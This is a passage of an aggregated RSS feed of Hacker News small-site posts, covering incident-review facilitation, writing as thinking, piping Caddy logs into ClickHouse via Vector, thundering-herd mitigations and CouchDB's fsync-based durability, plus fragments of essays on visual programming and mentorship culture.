    We have the hardware: our visual cortex is a powerhouse for pattern recognition and spatial reasoning. We just don’t have the right computational grammar to feed it. If we want a visual programming breakthrough, we have to leave the legacy of text-based paradigms behind and unearth a new kind of function—one that only makes sense visually. Once we do, the right ‘form’ will follow so obviously, we’ll wonder why we waited so long.


    [1] One way is with visual rule sets. This almost feels like declarative or logic programming. But as the Cell Pond talk at the top of the essay pointed out, unless you have a representation of rule sets that can be expanded, you suffer combinatorial explosion.

    [2] Depending on who you are, this can sound either like object-oriented programming or category theory.

    ]]>
    https://interjectedfuture.com/visual-programming-is-stuck-on-the-form/ hacker-news-small-sites-43206340 Fri, 28 Feb 2025 15:01:23 GMT
    <![CDATA[An Incident Review of an Incident Review – Will Gallego]]> thread link) | @vinnyglennon
    February 28, 2025 | https://willgallego.com/2025/01/11/an-incident-review-of-an-incident-review/ | archive.org

    So I bombed an incident review this week. More specifically, the facilitating.

    I’ve run post mortems/retrospectives/PIRs, whatever you want to call them, for over a decade. Just felt my arthritis kick in a bit as I typed that. It’s hard to quantify, to even qualify, subtle nuances and questions I’ve developed as handy go-to’s to get folks to speak up during interviews and meetings. My friend Lorin Hochstein said that facilitation is the hardest part of the work, which feels pretty on the money. You can always take another swing in an interview, prep what questions you’re likely to ask or come back around during the PIR (post incident review) with everyone. Walking through timelines and dashboards is toilsome, but it’s rarely more than an inconvenience of time and energy. I could see an argument made for summarization and write ups (“Tell me everything we will need to know, all the tasks to make sure this ‘doesn’t happen again’ – but make it short enough so folks will want to read it”).

    But running the meeting, yeah, that can be sneakily hard. You mostly have one shot at it and before an audience who you’ve convinced to spend their time in yet another meeting instead of “the real work” (aside – incidents are part of the real work). It’s very easy to lose folks, say the wrong thing, let emotions run high.

    Funny thing is I typically think of myself as worse at the parts outside of the meeting. I’ve got golden retriever energy when it comes to helping folks out, and the PIR meeting is where I shine. It’s my job to care about folks, to make sure they’re heard? And you’re going to pay me to see folks do the “aha!” moment when the parts click? Sign me up, that’s entirely my jam. I’m fairly loquacious and have a knack for vulnerability-as-means-of-disarming folks, getting them to feel that yes it’s ok to say “I don’t know”. I consider that last bit a personal superpower.

    So what went wrong? The humor of analyzing the analysis, finding the fault when we’re hunting through the pieces of an outage, isn’t lost on me. It’s also an easy slide into over-analyzing everything we do, like some college sophomore philosophy student who suddenly falls into a nihilistic hole, debating this newfound enlightenment with everyone. To spoil the ending, I leaned too heavily on my tropes and enthusiasm, with admittedly a bit of weariness from the week lying on top of the meeting. I’m also trying to build momentum for more PIR meetings, and since I know a surefire way to poison that is to set up a ton of very long and dry discussions, I condensed the review to a half hour to entice folks into joining. “That’ll surely be enough!” he lied to himself.

    I tend to talk. I probably say in twenty words what can be said in five. That can be comforting to some folks, vamping while they gather ideas. It's my crutch as I over-explain to really make sure folks understand. That was heavily present in this latest meeting. I got a nudge "Hey, let people talk more" in the meeting. Twice, actually, which is fairly impressive for only 30 minutes. That's one of my focal points for PIR meetings too – don't just repeat the narrative of events, let the participants state what happened. Folks will nod and say "Yup!" and agree with facilitators, who hold that small modicum of power within the virtual walls of the meeting, because that's what we're inclined to do. Surefire way to get people not to share their expertise.

    I was bummed for a few hours, because I felt it immediately after. No one had to mention it, I could see it clear as day. I try to leave five to ten minutes at the end of a meeting as a free space – action items, sure, but "what did we miss?" more so. There were at least two or three ideas of areas we failed to cover that feel pretty core to the learning. "Yeah, we still don't understand the source of the problematic requests, and…", etc.

    But the world didn’t end. It (typically) doesn’t when we have a major outage and I’m fairly confident we’ll be ok here. It’s good to recognize, even with a ton of experience, facilitators do have tried-and-true methods that can hinder if overused. I’ll also say, in retrospect, I had a question I was drilling down on for at least 15 minutes that I wanted answering, likely in my head before the meeting started. Checking bias at the door, notably when it’s your team in the driver’s seat, is hard.

    If nothing else, incidents are surprises. “Well that went wrong and caught me off guard” feels akin to that. I’ll grab this post another day in the future and appreciate it, a few more reviews under my belt that hopefully turn more my way.

    Photo: https://www.flickr.com/photos/cogdog/8761308672

    ]]>
    https://willgallego.com/2025/01/11/an-incident-review-of-an-incident-review/ hacker-news-small-sites-43206222 Fri, 28 Feb 2025 14:51:10 GMT
    <![CDATA[Write to Escape Your Default Setting]]> thread link) | @kolyder
    February 28, 2025 | https://kupajo.com/write-to-escape-your-default-setting/ | archive.org

    For those of us with woefully average gray matter, our minds have limited reach. For the past, they are enthusiastic but incompetent archivists. In the present, they reach for the most provocative fragments of ideas, often preferring distraction over clarity.

    Writing provides scaffolding. Structure for the unstructured, undisciplined mind. It’s a practical tool for thinking more effectively. And sometimes, it’s the best way to truly begin to think at all.

    Let’s call your mind’s default setting ‘perpetual approximation mode.’  A business idea, a scrap of gossip, a trivial fact, a romantic interest, a shower argument to reconcile something long past. We spend more time mentally rehearsing activities than actually doing them. You can spend your entire life hopping among these shiny fragments without searching for underlying meaning until tragedy, chaos, or opportunity slaps you into awareness.

    Writing forces you to tidy that mental clutter. To articulate things with a level of context and coherence the mind alone can’t achieve. Writing expands your working memory, lets you be more brilliant on paper than you can be in person.

    While some of this brilliance comes from enabling us to connect larger and larger ideas, much of it comes from stopping, uh, non-brilliance. Writing reveals what you don’t know, what you can’t see when an idea is only held in your head. Biases, blind spots, and assumptions you can’t grasp internally.

    At its best, writing (and reading) can reveal the ugly, uncomfortable, or unrealistic parts of your ideas. It can pluck out parasitic ideas burrowed so deeply that they imperceptibly steer your feelings and beliefs. Sometimes this uprooting will reveal that the lustrous potential of a new idea is a mirage, or that your understanding of someone’s motives was incomplete, maybe projected.

    If you’re repeatedly drawn to a thought, feeling, or belief, write it out. Be fast, be sloppy. Just as children ask why, why, why, you can repeat the question “why do I think/feel/believe this?” a few times. What plops onto the paper may surprise you. So too will the headspace that clears from pouring out the canned spaghetti of unconnected thoughts.

    “Writing about yourself seems to be a lot like sticking a branch into clear river-water and roiling up the muddy bottom.”

    ~Stephen King, Different Seasons (Book)

    “I write entirely to find out what I’m thinking, what I’m looking at, what I see and what it means. What I want and what I fear.”

    ~Joan Didion, Why I Write (Article)

    ]]>
    https://kupajo.com/write-to-escape-your-default-setting/ hacker-news-small-sites-43206174 Fri, 28 Feb 2025 14:45:36 GMT
    <![CDATA[Getting Caddy Logs into ClickHouse via Vector]]> thread link) | @zX41ZdbW
    February 28, 2025 | https://scottstuff.net/posts/2025/02/27/caddy-logs-in-clickhouse-via-vector/ | archive.org

    As mentioned before, I’ve been using the Caddy web server running on a couple machines to serve this site. I’ve been dumping Caddy’s access logs into Grafana’s Loki log system, but I haven’t been very happy with it for web logs. It’s kind of a pain to configure for small uses (a few GB of data on one server), and it’s slow for my use case. I’m sure I could optimize it one way or another, but even without the performance issues I’m still not very happy with it for logs analysis. I’ve had a number of relatively simple queries that I’ve had to fight with both Loki and Grafana to get answers for.

    In this specific case, I was trying to understand how much traffic my post on the Minisforum MS-A2 was getting and where it was coming from, and it was easier for me to grep through a few GB of gzipped JSON log files than to get Loki to answer my questions. So maybe it’s not the right tool for the job and I should look at other options.

    I’d been meaning to look at Clickhouse for a while; it’s an open source (plus paid cloud offering) column-store analytical DB. You feed it data and then use SQL to query it. It’s similar to Google BigQuery, Dremel, and dozens of other such systems.

    The big advantage of column-oriented databases is that queries that only hit a few fields can be really fast, because they can ignore all of the other columns completely. So a typical analytic query can just do giant streaming reads from a couple of columns without any disk seeks, which means your performance mostly just ends up being limited by your disks’ streaming throughput. Not so hot when you want to fetch all of the data from a single record, but great when you want to read millions of rows and calculate aggregate statistics.

    I managed to get Clickhouse reading Caddy’s logs, but it wasn’t quite as trivial as I’d hoped, and none of the assorted “how to do things like this” docs that I found online really covered this case very well, so I figured I’d write up the process that I used.

    Installing Clickhouse

    Setting up Clickhouse is trivial; their docs provide the usual curl | sh option as well as an Apt repository for Debian and Ubuntu.

    I’m just running it on a single system and I’m really not planning on shoving a ton of data into it, so a basic install should be fine. The only settings to worry about are the usual database access control settings – what is the default password, and are network accesses allowed? Pretty much everything can be tweaked via config files or live DB changes after installation.

    In my case, I want to allow network connections, and I want to create a new user called weblogger that is allowed to connect without a password from a specific network block. That’s pretty easy to set up:

    CREATE USER 
      weblogger 
    NOT IDENTIFIED 
    HOST IP '172.16.0.0/12';

    Next, I want to create a new database just for weblogs:
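
    The statement itself is just the standard one-liner (sketched here; only the database name weblogs is certain, from the schema below):

    CREATE DATABASE weblogs;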

    This gives me a new database namespace for weblog data.

    Creating a schema for Caddy

    Next, I want to create a table for storing Caddy’s weblog data. This probably isn’t ideal, but it works for me at the moment. I’ve added basically everything from Caddy’s JSON format, plus a couple additional fields that I’m going to populate in my import pipeline later.

    Note that I’m not really reformatting Caddy’s logs here – they contain nested JSON objects, and I’ve kept the same format in Clickhouse by using Tuple and Map types. Tuple fields can be read in the obvious way; select request.headers['User-Agent'] will fetch the User-Agent header from the request.headers map from inside of the request tuple.

    Here’s the schema that I’m currently using:

    CREATE TABLE weblogs.weblogs
    (
        `level` String,
        `ts` Float64,
        `timestamp` DateTime64(3),
        `server` String,
        `msg` String,
        `request` Tuple(
          `remote_ip` String,
          `remote_port` String,
          `client_ip` String,
          `proto` String,
          `method` String,
          `host` String,
          `uri` String,
          `headers` Map(String, String),
          `tls` Tuple(
             `resumed` Bool,
             `version` Int32,
             `cipher_suite` Int32,
             `proto` String,
             `server_name` String,
          ),
        ),
        `bytes_read` UInt64,
        `duration` Float64,
        `size` UInt64,
        `status` UInt16,
        `resp_headers` Map(String, String),
        `request_url` String,
    )
    ENGINE = MergeTree
    ORDER BY tuple(request.host, ts);

    Next, I want to give the weblogger user the ability to query and write this table:

    GRANT 
      select, insert 
    ON weblogs.weblogs 
    TO weblogger;

    Combined with the IP-based auth scheme (above), that’s probably sufficient for my uses. Anyone who breaks into my web server can still query my web logs, but they’re already sitting on disk on the server, and there really isn’t anything sensitive in there anyway. They can’t delete data or access any other tables, at least not without exploiting some sort of security hole. I’m fine with that for home use.

    Adding data to Clickhouse manually

    So, I can batch-import data from Caddy’s logs into Clickhouse trivially from Clickhouse’s CLI via

    INSERT INTO 
      weblogs 
    FROM infile 'caddy-scottstuff.net.log' 
    FORMAT JSONEachRow;

    That’ll read the specified file and dump it into Clickhouse, decoding JSON as it goes.

    So, that’s easy enough, but how do you stream new data into Clickhouse from Caddy?

    Live import using Vector

    Enjoyably, Clickhouse has a blog post that walks through most of the options for live-importing data into Clickhouse. For log-like data, the recommended choices are the OTEL Collector, Vector, or Fluentbit.

    I’ve had a hard time wrapping my head around OTEL collector configs in the past, and I’ve never been all that happy with Fluent-family log collectors, while my very limited experience with Vector has been pretty positive. So I figured I’d give it a try.

    Vector is kind of a monitoring middleware swiss army knife; it can read data from files or the network in a pile of different formats and protocols, then (optionally) perform filtering/data reduction/merging, and then send data out in another pile of formats. In this case, it’s perfectly capable of reading JSON line-by-line from a file (remembering progress across restarts), decoding it, and then piping it into Clickhouse.

    Installing Vector is very similar to installing Clickhouse – either a curl | sh or an Apt repository is available.

    The only thing that’s left is to tell Vector what you want it to do. Here’s my /etc/vector/vector.yaml config, more or less:

    sources:
      weblogs:
        type: "file"
        include:
          - /var/log/caddy/caddy*.log
    
    transforms:
      caddy:
        type: remap
        inputs: ["weblogs"]
        source: |
          . = parse_json!(.message)
          .server = get_hostname!()
          time = from_unix_timestamp!(to_int!(.ts * 1000 ?? 0), unit: "milliseconds")
          .timestamp = format_timestamp!(time, format: "%F %H:%M:%S%.f")
          proto = "http"
          if .request.tls.proto == "h2" || .request.tls.proto == "h3" {
            proto = "https"
          }
          .request_url, _ = proto + "://" + downcase(.request.host) + .request.uri
    
    sinks:
      clickhouse:
        type: "clickhouse"
        inputs: ["caddy"]
        endpoint: "http://10.0.0.28:8123"
        database: "weblogs"
        table: "weblogs"
        auth:
          user: weblogger
          strategy: basic
          password: ""

    The “fun” part of this is the transform, which decodes the JSON (it’s possible to have Clickhouse do that on its own, but then Vector wouldn’t be able to modify some of the data). Then I turn Caddy’s floating-point timestamp into a millisecond-accurate text string (because Clickhouse can convert ints to DateTime64 values, or it can convert ISO-ish strings with fractional seconds to DateTime64, but it can’t convert floating point numbers directly!?). Then I add the server name, so I can tell which server handled which log, and try to regenerate the actual URL using a bit of logic. It’s not quite right, but it’s close enough for my needs right now.

    Displaying and querying results

    Finally, I installed the Clickhouse plugin for Grafana (just one click in the web UI), gave it a URL, username, and password, and I was able to add queries on Grafana dashboards. Or I can use the clickhouse-client UI to issue SQL directly for ad-hoc queries.

    > select count(distinct request.uri) from weblogs.weblogs;
    
    SELECT countDistinct(request.uri)
    FROM weblogs.weblogs
    
    Query id: 13993860-959f-40ed-a7e8-3ed4ee6db4c9
    
       ┌─countDistinct(request.uri)─┐
    1. │                      19453 │
       └────────────────────────────┘
    
    1 row in set. Elapsed: 0.083 sec. Processed 3.90 million rows, 54.41 MB (47.19 million rows/s., 658.08 MB/s.)
    Peak memory usage: 28.82 MiB.

    So, I have roughly 19,000 distinct URIs in my 3.9M log entries, and it was able to answer that in 83 milliseconds, processing around 650 MB/sec. I expect that larger tables on this hardware would get somewhat higher read speeds. In any case, it’s hard to argue with 83 millisecond queries.

    ]]>
    https://scottstuff.net/posts/2025/02/27/caddy-logs-in-clickhouse-via-vector/ hacker-news-small-sites-43205932 Fri, 28 Feb 2025 14:25:34 GMT
    <![CDATA[How to Handle Sudden Bursts of Traffic or "Thundering Herd Problem"?]]> thread link) | @vinnyglennon
    February 28, 2025 | https://newsletter.scalablethread.com/p/how-to-handle-sudden-bursts-of-traffic | archive.org

    Imagine a scenario where an event causes one or more of your services to experience an enormous surge in traffic, overwhelming their capacity. This can lead to one or more dependencies, such as a database, becoming overloaded and unresponsive, ultimately resulting in service failure (cascading failures). Such events could include multiple service instances failing and redirecting all traffic to a single instance, a viral image or video receiving huge viewership, or an online sale during a festival causing a database overload. This situation, where cascading failures lead to service unavailability due to a sudden spike in incoming traffic, is termed the Thundering Herd Problem.

    Fig. Thundering Herd Problem

    When a service fails to respond, the instinctive solution is to retry the request, assuming a transient failure. However, this approach can lead to the Thundering Herd scenario or exacerbate an existing one, as all clients retry simultaneously, overwhelming system resources. Instead, if clients retry at random intervals, the overloaded resource gets time to recover and respond. This randomness in retry timing, known as Jitter, helps distribute the load more evenly and prevents further strain on the system.

    Fig. Exponential Jitter and Retry
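
    To make that concrete, here is a minimal Python sketch of retrying with exponential backoff and full jitter; TransientError and retry_with_jitter are invented names for the example:

    import random
    import time

    class TransientError(Exception):
        """Placeholder for whatever failure your client treats as retryable."""

    def retry_with_jitter(call, max_attempts=5, base=0.1, cap=10.0):
        for attempt in range(max_attempts):
            try:
                return call()
            except TransientError:
                # Exponential backoff (0.1s, 0.2s, 0.4s, ...) capped at `cap`,
                # with full jitter so clients don't all retry in lockstep.
                time.sleep(random.uniform(0, min(cap, base * 2 ** attempt)))
        raise RuntimeError("all retries exhausted")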

    Consider a scenario where a request to fetch an image from the cache results in a miss, leading to the request being fulfilled from the origin datastore. If a large number of simultaneous requests experience cache misses and are forwarded to the data store, this can create the Thundering Herd problem. Since all the requests are for the same image, only a single request should be forwarded to the datastore for fulfillment. The remaining requests can be queued and served from the cache once it is updated after the initial request returns from the data store.

    Fig. Queueing Requests
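
    A single-process Python sketch of that coalescing idea, sometimes called “single flight” (CoalescingCache and its methods are invented names for the example):

    import threading

    class CoalescingCache:
        """On a cache miss, only the first caller fetches from the origin;
        concurrent callers for the same key wait for and reuse that result."""

        def __init__(self, fetch_from_origin):
            self._fetch = fetch_from_origin
            self._cache = {}
            self._locks = {}
            self._guard = threading.Lock()

        def get(self, key):
            if key in self._cache:
                return self._cache[key]
            with self._guard:
                lock = self._locks.setdefault(key, threading.Lock())
            with lock:
                # Re-check: another thread may have filled the cache while we waited.
                if key not in self._cache:
                    self._cache[key] = self._fetch(key)
                return self._cache[key]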

    Every large-scale application at some point requires service replication on the backend to handle increasing traffic. However, if this traffic is not evenly distributed across all service replicas, it can overwhelm specific instances. Using load balancers to distribute the load uniformly helps prevent the Thundering Herd problem.

    Fig. Load Balancing

    If a service exposes APIs, providing unlimited access to its clients can be disastrous if one or more clients abuse it. Scenarios like DDoS attacks or scheduled batch jobs can trigger the Thundering Herd problem. Implementing rate limiting to control how frequently a client can call the API can help manage high-throughput clients and prevent such issues.

    Fig. Rate Limiting
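
    As an illustration, a small token-bucket limiter in Python, one common way to implement rate limiting (the names are invented for the example, and it is not thread-safe):

    import time

    class TokenBucket:
        """Allow `rate` requests per second, with bursts up to `capacity`."""

        def __init__(self, rate, capacity):
            self.rate = rate
            self.capacity = capacity
            self.tokens = capacity
            self.updated = time.monotonic()

        def allow(self):
            now = time.monotonic()
            # Refill tokens for the time elapsed since the last check.
            self.tokens = min(self.capacity, self.tokens + (now - self.updated) * self.rate)
            self.updated = now
            if self.tokens >= 1:
                self.tokens -= 1
                return True
            return False  # caller should reject or delay this request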

    A service dependency, such as a database, can fail due to the Thundering Herd problem. Similar to how an MCB (Miniature Circuit Breaker) protects a circuit by breaking it when there's a sudden spike in current, a service can implement a circuit breaker approach. This approach halts sending further outgoing requests to the dependency until it recovers and is ready to handle traffic again.

    Fig. Circuit Breaker
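
    A minimal Python sketch of a circuit breaker (the names and thresholds are invented for the example; production implementations usually add richer half-open handling):

    import time

    class CircuitBreaker:
        """Open after `threshold` consecutive failures; allow a trial
        request again once `reset_after` seconds have passed."""

        def __init__(self, threshold=5, reset_after=30.0):
            self.threshold = threshold
            self.reset_after = reset_after
            self.failures = 0
            self.opened_at = None

        def call(self, fn):
            if self.opened_at is not None:
                if time.monotonic() - self.opened_at < self.reset_after:
                    raise RuntimeError("circuit open: failing fast")
                self.opened_at = None  # half-open: let one trial request through
            try:
                result = fn()
            except Exception:
                self.failures += 1
                if self.failures >= self.threshold:
                    self.opened_at = time.monotonic()
                raise
            self.failures = 0
            return result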

    While a circuit breaker allows a service to stop sending requests to a dependency, the dependency itself can drop incoming requests, a technique known as load shedding, to prevent the Thundering Herd problem. This is similar to rolling blackouts in the electrical world, where an electricity provider reduces the load to prevent a total system failure when demand exceeds capacity.

    Fig. Load Shedding
    ]]>
    https://newsletter.scalablethread.com/p/how-to-handle-sudden-bursts-of-traffic hacker-news-small-sites-43205514 Fri, 28 Feb 2025 13:47:02 GMT
    <![CDATA[CouchDB Prevents Data Corruption: Fsync]]> thread link) | @fanf2
    February 28, 2025 | https://neighbourhood.ie/blog/2025/02/26/how-couchdb-prevents-data-corruption-fsync | archive.org

    Programming can be exciting when the underlying fundamentals you’ve been operating under suddenly come into question. Especially when it comes to safely storing data. This is a story of how the CouchDB developers had a couple of hours of excitement making sure their fundamentals were solid (and your data was safe).

    Modern software projects are large enough that it is unlikely that a single person can fit all of its constituent parts in their working memory. As developers we have to be okay with selectively forgetting how the program we are working on at the moment works in some parts to make progress on others.

    Countless programming techniques as old as time itself (01.01.1970) help with this phenomenon and are commonly categorised as abstractions. As programmers we build ourselves abstractions in order to be able to safely forget how some parts of a program work.

    An abstraction is a piece of code, or module, or library, that has a public API that we can use and remember that tells us what we can do with the piece of code, and that we can remember to have certain guarantees. Say a module has a function makeBlue(thing): you don’t necessarily have to remember how the function makes thing blue, all you need to know is that it does.

    CouchDB is not a particularly large piece of software, but it is a relatively long-running one, having been started in 2005. Certain parts of CouchDB are relatively old, meaning they solve a specific problem and we worked hard at the time to make sure we solved that problem good and proper, and now all we, the CouchDB developers, remember is that we did solve it and that we can trust it. After that we don’t have much need to reevaluate the code in the module on an ongoing basis, so we are prone to forget specific details of how it works.

    One consequence of this is that if new information appears that might affect the design of the old and trusted module, you have to scramble to re-understand all the details to see how the module fares in light of the new information.

    This happened the other week when the CouchDB developers came across Justin Jaffray’s second part of his “NULL BITMAP Builds a Database” series: “#2: Enter the Memtable”. In it, Justin describes three scenarios for how data is written to disk under certain failure situations and evaluates what that means for writing software that does not want to lose any data (you know, a database).

    CouchDB has long prided itself on doing everything in its power to not lose any data by going above and beyond to make sure your data is safe, even in rare edge-cases. Some other databases do not go as far as CouchDB goes.

    For a moment, the CouchDB development team had so collectively expunged the details of how CouchDB keeps data safe on disk that we could not immediately evaluate whether CouchDB was susceptible to data loss in the specific scenario outlined by Justin.

    To understand the scenario, we have to explain how Unix systems — and especially Linux — reads and writes data to disk. Before we go there though, rest assured this had us sweating for a hot minute. The CouchDB dev team literally stopped any other work and got together to sort out whether there was something we had to do. Data safety truly is a top priority.

    The Art of Reading and Writing Data to Disk

    For Unix programs to operate on files, they have to acquire a file handle with the syscall open. Once acquired, the program can use the file handle to read or write any data it likes by specifying an offset and a length, both in bytes, that describe where in the file and how much of the file should be read or written.

    The Unix kernel will respond to these syscalls by accessing the filesystem the file lives on. A filesystem’s job is to organise an operating system’s files onto a storage mechanism (NVMe, SSDs, hard drives, block storage etc.) and provide fast and safe access to those files.

    All file systems define a block size. That is a chunk of bytes that is always read or written in bulk. Common block sizes are 4096 or multiples thereof, like 8192 or 16384, sometimes even 128k. These blocks, or pages, exist so file systems can efficiently make use of all the available storage space.

    A consequence of this is that if you just want to read a single byte from storage, the kernel and file system will read at least a page of data and then only return the one byte. Even with the lowest page size of 4096, that’s 4095 bytes read from disk in vain.

    As a result, most programs try to avoid reading one byte at a time and instead aim for aligning their data in a way that maps directly to the page size or multiples thereof. For example, CouchDB uses a 4096 byte page, PostgreSQL uses 8192.

    The fundamental trade-off that is made with the various options for page sizes is latency vs. throughput at the cost of I/O amplification. In our example earlier, reading a single byte is fastest (i.e. happens with the lowest latency) from a 4096 byte page, at a ~4000x read amplification cost. On the opposite end, reading 1GB of data for a movie stream in 4096 byte chunks has no direct amplification (all bytes read are actually needed), but that will require 250,000 read requests to the file system. A larger page size like 1M will greatly improve streaming throughput.

    So there’s a value to getting the page size right for the kind of application. For databases this usually means making it as small as possible, as individual records should be returned quickly, without sacrificing too much streaming performance for larger pieces of data.

    The final piece of the puzzle is the page cache. This is the Unix kernel keeping file system pages in memory so it can serve them faster the next time they are requested.

    Say you read the page (0,4096) once, the kernel will instruct the filesystem to load the bytes from storage into a kernel memory buffer. When you then read that same page again, the kernel will respond with the in-memory bytes instead of talking to the file system and storage again. And since storage is ~800,000 times slower than main memory, your second read is going to be a lot faster.

    The same is happening for writing pages: if you write a new page (4097,8192) and then immediately read it again, that read will be very fast indeed, thanks to the page cache.

    So far so good. How could this go wrong?

    When writing a new page, the Unix kernel can choose to write it into the page cache and then return the write call as a success. At that point, the data only lives in kernel memory, and if the machine this runs on has a sudden power outage or kernel panic or other catastrophic failure, that data will be gone by the time the system has rebooted.

    That’s a problem for databases. When a database like CouchDB writes new data to storage, it must make sure the data actually fully made it to storage in a way that it can guarantee to read again later, even if the machine crashes. For that purpose, the Unix kernel provides another syscall: fsync, which tells the kernel to write the data actually onto storage and not just into the page cache.

    However, because the page cache provides a ludicrous speed improvement, databases aim to not fsync every single page. Instead they try to fsync as little as possible, while making sure data makes it safely to storage.

    But what happens if nobody ever calls fsync? Will the data be lost for good? Not quite: the kernel will decide when to flush the block to disk, once the CPU and disk aren’t otherwise busy. If that never happens, the kernel eventually pauses processes that are writing to disk, so it can safely flush the cached blocks to disk.

    Heads up: we are going to gloss over a lot of details here to keep this under 50,000 words.

    CouchDB database files consist of one or more B+-trees and a footer. On startup a database file is opened and read backwards until it finds a valid footer. That footer contains, among some metadata, a pointer to each of the B+-trees, which are then used to fulfil whatever request for reading or writing data needs to be handled.

    When writing new data, CouchDB adds pages with B+-tree nodes to the end of the database file and then writes a new footer after that, which includes a pointer to the newly written B+-tree nodes.

    To recap, the steps for reading are:

    1. Open the database.
    2. Read backwards until a valid footer is found.
    3. Traverse the relevant B+-tree to read the data you are looking for.

    For writing:

    1. Open the database.
    2. Read backwards until a valid footer is found.
    3. Add new B+-tree nodes to the end of the file.
    4. Add a new footer.
      bt = B+-tree node, f = footer
    ┌──┬──┬──┬──┬──┬──┬──┬──┐
    │  │ ◄┼─ │  │ ◄┼─ │  │  │
    │ ◄┼─ │  │  │  │  │ ◄┼─ │               db file
    │  │  │  │ ◄┼──┼─ │  │  │
    └──┴──┴──┴──┴──┴──┴──┴──┘
     bt bt f  bt bt f  bt f
    
    A database file with three footers, i.e. a file that has received
    three writes. The footer includes pointers to B+-tree nodes.
    
     bt = B+-tree node, f = footer
    ┌──┬──┬──┬──┬──┬──┬──┬──┬──┬──┬──┐
    │  │  │  │  │  │  │  │  │  │ ◄┼─ │
    │  │  │  │  │  │  │  │  │ ◄┼──┼─ │      db file
    │  │  │  │  │  │  │  │  │  │  │  │
    └──┴──┴──┴──┴──┴──┴──┴──┴──┴──┴──┘
     bt bt f  bt bt f  bt f  bt bt f
    
     The same database file, with two more B+-tree nodes and footer

    With all this information we can revisit The Sad Path in Justin’s post:

    I do a write, and it goes into the log, and then the database crashes before we fsync. We come back up, and the reader, having not gotten an acknowledgment that their write succeeded, must do a read to see if it did or not. They do a read, and then the write, having made it to the OS's in-memory buffers, is returned. Now the reader would be justified in believing that the write is durable: they saw it, after all. But now we hard crash, and the whole server goes down, losing the contents of the file buffers. Now the write is lost, even though we served it!

    Let’s translate this to our scenario:

    • “The log” is just “the database file” in CouchDB.
    • A “hard crash“ is a catastrophic failure as outlined above.
    • The “file buffers” are the page cache.

    In the sad path scenario, we go through the 4 steps of writing data to storage. Without any fsyncs in place, CouchDB would behave as outlined. But CouchDB does not, as it does use fsyncs strategically. But where exactly?

    CouchDB calls fsync after step 3 and again after step 4. This is to make sure that data referenced in the footer actually ends up in storage before the footer. That’s because storage is sometimes naughty and reorders writes for performance or just chaos reasons.
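
    In Python terms, a rough sketch of that ordering only (CouchDB itself is written in Erlang; the commit function here is invented for illustration):

    import os

    def commit(fd, btree_nodes, footer):
        os.write(fd, btree_nodes)
        os.fsync(fd)  # after step 3: the nodes reach storage before the footer is written
        os.write(fd, footer)
        os.fsync(fd)  # after step 4: the footer itself reaches storage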

    If CouchDB is terminated before the first fsync, no data has been written. On restart, the previously existing footer will be found and any data it points to can be read. This will not include the write that was just interrupted, as none of that made it to memory or storage yet and the request has not returned with a success to the original caller.

    If CouchDB is terminated after the first but before the second fsync, data will have made it both to the page cache and disk, but the footer might not have made it yet. If it did not, same as before: the previously existing footer will be found on restart, and the current writer will not have received a successful response. If it did make it, we know because of the first fsync that any data it points to will be safely on disk, so we can load it as a valid footer.

    But what if the footer makes it to the page cache but not storage, and we restart CouchDB, read the footer, and retrieve its data from the page cache? The writer could issue a read to see if its data made it and, if it did, not retry the write: boom, we are in the sad path, and if the machine now crashes, that footer is gone. For good. And with it, any pointer to the data that was just written.

    However, CouchDB is not susceptible to the sad path. Because it issues one more fsync: when opening the database. That fsync causes the footer page to be flushed to storage and only if that is successful, CouchDB allows access to the data in the database file (and page cache) because now it knows all data to be safely on disk.
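
    Sketched the same way (again an invented function, not CouchDB’s actual code):

    import os

    def open_database(path):
        fd = os.open(path, os.O_RDWR)
        os.fsync(fd)  # flush any footer still sitting only in the page cache
        return fd     # only now trust what we read, including the footer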

    After working out these details, the CouchDB team could return to their regularly scheduled work items as CouchDB has proven, once again, that it keeps your data safe. No matter what.

    « Back to the blog post overview

    ]]>
    https://neighbourhood.ie/blog/2025/02/26/how-couchdb-prevents-data-corruption-fsync hacker-news-small-sites-43205512 Fri, 28 Feb 2025 13:46:49 GMT
    <![CDATA[How to Build a Mentorship Culture]]> thread link) | @mooreds
    February 28, 2025 | https://www.nathanbroslawsky.com/p/how-to-build-a-mentorship-culture-not-just-another-program/ | archive.org

    Every company should be looking for ways to grow and nurture their people. However, when companies introduce “mentorship,” it usually takes the form of a new internal matching service, pairing up employees who wouldn't naturally interact in their day-to-day work. However, a mentorship program is different from a mentorship culture, and the latter is where the real impact can happen. For that, we need to challenge the “add-on” implementation approach.

    Mentorship Culture

    A “mentorship culture” is one where everyone believes that it is their responsibility to share what they know and make those around them better. The corollary to this is the mindset that everyone can learn something from everyone around them. The abilities and willingness to both share and to learn are core to building this culture, and like any other aspect of the company culture, you have to be very intentional about how you hire for it.

    This culture must extend beyond values statements into our day-to-day work. While many organizations may struggle with ideas for how to operationalize mentorship, the opportunity often already exists within their standard processes. It's present anywhere feedback is given: product review meetings, design critiques, architectural reviews, code reviews, you name it. Every one of these interactions is an opportunity to have a meaningful exchange of knowledge.

    Building this into organizational habits takes deliberate effort and proper incentives. As Charlie Munger said, "Show me the incentive, I'll show you the outcome." There needs to exist an organizational expectation that this type of mentoring happens consistently. Simply put, this starts with leaders modeling this behavior and holding others accountable to it as well. Across the company, the more senior an individual becomes, regardless if they are an individual contributor or a manager, a larger part of the assessment of their performance should be that they are regularly taking others under their wing and helping them grow. Once this starts to happen, these bonds start to strengthen, more connections start to be made, and the culture starts to take root.

    Knowledge Flows Both Ways

    Simon Sinek says "I think mentor relationships aren't mentor-mentee, they should be mentor-mentor. And one should only agree to be someone's mentor if you want them to be your mentor too." This perspective fundamentally changes how we think about mentorship within organizations. Remember, in a true mentorship culture, everyone genuinely believes they have something to learn from everyone else.

    I experienced this principle in action a while back during a 1:1 with an engineer in my organization who asked me a specific question about how part of our business worked. When I asked who they had reached out to for information, they admitted being at a loss about who they could approach. I connected them with the head of that department (despite their initial protest of "no! They will be too busy to meet with me!"). The day after they met, that department head reached out to me, energized and excited about everything he had learned about our engineering process, how work gets done, and opportunities for improvement.

    This bi-directional learning opportunity creates tremendous value. More senior team members, from one level up all the way to the CEO, can learn from their junior employees about the newest tools and technologies, see problems through fresh eyes, or gain insight into emerging trends. It is sometimes taken for granted, but mentoring, like delivering feedback, is a skill that develops over time. When mentoring is seen as one-way, the more senior someone gets, typically the less open they are to these learning opportunities. Years ago, I worked at a 500-person company, and I remember on the first day of work, my VP of Engineering set this tone perfectly: "Every day I come to work, and I get to see 500 people who are smarter than me." These mentorship opportunities truly are everywhere.

    Strategic Benefits

